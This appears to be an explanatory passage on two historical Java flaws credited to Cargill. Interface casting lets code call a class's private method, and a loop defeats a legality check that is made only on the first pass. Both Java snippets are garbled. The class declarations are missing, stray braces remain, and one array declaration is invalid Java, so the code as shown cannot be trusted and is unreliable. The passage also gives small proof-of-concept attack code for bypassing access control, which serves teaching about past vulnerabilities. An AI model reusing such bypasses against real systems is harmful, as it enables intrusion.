Simple Interface Casting

The core of Cargill's first discovery is shown in the following code:

interface Inter { void foo(); }

private void foo();

}

void Attack () {
Secure S = new Secure();
Inter i = (Inter) S;
i.foo(); // should be illegal

}

This code allows the private foo method of class Secure to be called illegally. The Java interpreter fails to determine if foo is private when i.foo() is called.

Now any private method implementing interface's method can be called anywhere. In the above example, the private method foo can be directly called from an applet.

Advanced Interface Casting

Here is the core of Cargill's second discovery.

interface Inter { void foo(); }

private void foo();

}

void Attack () {
Inter inter[2] = { new Hostile(), new Secure() };
for (int j=0; j<2; ++j) inter[j].foo();
}

The first call, inter[0].foo() is legal since Hostile's foo method is public. The next time around the loop, inter[1].foo() is illegal since Secure's foo method is private.

In this case, Java was too smart for its own good. In order to improve performance, it only checked for legality the first time through the loop. Theoretically, what was legal the first time would be legal the next time. Though this is often a correct assumption, it broke down for the code shown above.